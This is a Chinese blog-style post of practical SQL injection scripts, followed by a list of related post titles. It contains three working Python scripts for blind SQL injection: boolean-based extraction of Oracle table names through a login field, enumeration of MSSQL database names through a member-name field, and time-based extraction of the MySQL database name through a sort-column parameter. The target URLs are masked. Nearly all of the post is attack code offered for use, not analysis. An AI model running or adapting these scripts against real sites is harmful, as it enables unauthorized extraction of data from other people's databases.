【实战】SQL注入小脚本
1、ORACLE布尔型盲注
import urllib import urllib2 import requests payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retrive database:' database= '' #需要先手工判断当前表名长度 for i in range(1, 21): for payload in payloads: try: values[' values[' values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload)) data = urllib.urlencode(values) url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json" req = urllib2.Request(url,data=data,headers=header) resp = urllib2.urlopen(req).read() #匹配关键字输出正确的数据库名 if "status" in resp: database += payload print 'the database is:'+ database break else: print 'dumping database...' except Exception,e: print e
2、MSSQL布尔型盲注
import urllib import urllib2 import requests payloads = 'abcdefghijklmnopqrstuvwxyz_' header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'} values={} print 'Start to retrive database:' user= '' length=[] databases=[] db='' #注出数据库 def dump_db(i,j): global db for n in range(1,j+1): for payload in payloads: try: values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload) data = urllib.urlencode(values) url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx" req = urllib2.Request(url,data=data,headers=header) resp = urllib2.urlopen(req).read() if "Robert" in resp: db += payload print db if n == j: databases.append(db) db='' break else: print 'dumping database...' except Exception,e: print e #遍历判断数据库的长度,需要手工判断数据库个数 for i in range(1,19): for j in range(1,16): try: values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j) data = urllib.urlencode(values) url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx" req = urllib2.Request(url,data=data,headers=header) #print req resp = urllib2.urlopen(req).read() #print resp if "Robert" in resp: print 'the length of DB_%s is %s' % (str(i),str(j)) dump_db(i,j) #print 'the DB is: %s' % str(db) length.append(j) break else: print 'dumping length...' except Exception,e: print e print '-------------------------' for ddd in range(0,17): print databases[ddd] print '-------------------------'
3、MYSQL基于时间的盲注
import urllib import urllib2 import time payloads = 'abcdefghijklmn@_.opqrstuvwxyz0123456789' header = {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} values={} print 'Start to retrive database:' database= '' for i in range(1, 6): for payload in payloads: try: values['pageSize']=10 values['pageNum']=1 values['isAsc']='asc' values['orderByColumn']="(select*from(select(if(ascii(mid(database(),%s,1))=%s,sleep(2),1)))a)" % (i,ord(payload)) data = urllib.urlencode(values) url = "https://xxx.xxx.xxx/system/user/list" t_s = time.time() request = urllib2.Request(url,data,headers=header) response = urllib2.urlopen(request,timeout=5) t_e = time.time() if((t_e-t_s)>2): database += payload print 'the database() is:\t' + database time.sleep(2.0) break else: print 'dumping......' except: pass
【实战】SQL注入小脚本的更多相关文章
- zabbix(sql注入判断脚本)
zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...
- Zabbix sql注入漏洞脚本执行反弹shell
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...
- 实战SQL注入
SQL注入是啥就不解释了.下面演示一个SQL注入的例子 SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例. 1.漏洞试探 root@kali:~ ...
- python打造一个分析网站SQL注入的脚本
前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...
- python SQL注入测试脚本(更新中)
import requests import json import warnings warnings.filterwarnings("ignore") url = 'https ...
- sql注入小姿势
利用/*!union*/可以绕过对union的过滤
- SQL注入不简单?那是你没有懂它的原理~
我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏 ...
- Web安全学习笔记 SQL注入下
Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的 ...
- MySQL SQL 注入
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本博文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是 ...
随机推荐
- ISO/IEC 9899:2011 条款5——5.1 概念模型
5.1 概念模型 5.1.1 翻译环境 5.1.2 执行环境
- setInterval调用ajax回调函数不执行的问题
setInterval调用ajax回调函数不执行 1.首先检查你的setInterval()函数写法是否正确 参考写法 // 检查是否支付成功 var isPayRequest=false; var ...
- django 使用PyMySQL连接mysql
* 安装pymysql模块 pip install pymysql * settings.py添加下面设置 ## pymysql repalce mysqldb import pymysql pymy ...
- 零基础学Python-第二章 :Python基础语法-04.Python程序的书写规则
#号后面的都是注释 import是导入一个模块 结束
- Apache调优(一)
(1).Apache和Tomcat的关系 Apache HTTPD Server与Apache Tomcat同属于Apache的开源项目.两个都可以单独作为web server使用,但是又都有各自的特 ...
- 戒邪淫利器:《楞严经 四种清净明诲》实例及原经文 (转自学佛网:http://www.xuefo.net/nr/article55/545256.html)
今日得持首楞严,不读天下糟粕书! 当你读完楞严经后就会很真实的升起这个感觉!根本觉得其他书都是多余的!所以<楞严经>还是要多读,多看!并且<楞严经>戒淫的效果特别好!好好的珍惜 ...
- delphi self.Update 什么作用
更新指定窗口的客户区.如果窗口更新的区域不为空,UpdateWindow函数就发送一个WM_PAINT消息来更新指定窗口的客户区.函数绕过应用程序的消息队列,直接发送WM_PAINT消息给指定窗口的窗 ...
- pipline中替换tag变量
实验架构: 192.168.0.96 gitlab 192.168.0.97 jenkins 192.168.0.98 harbor.docker集群 说明:下面代码编译镜像那一步的代码必须靠左,目的 ...
- div定位relative和absolute测试1
div里的position定位也是比较常见的,relative是相对定位,absolute是绝对定位.如本文测试:body自带8px的margin,这里不对其进行清空.蓝色的div和红色的div分别设 ...
- eNSP上VLAN的基础的配置及access接口
本实验模拟公司内部,为不同的部门划分不同的VLAN ,形成的不同广播域,来保护信息的安全,拓扑图如下所示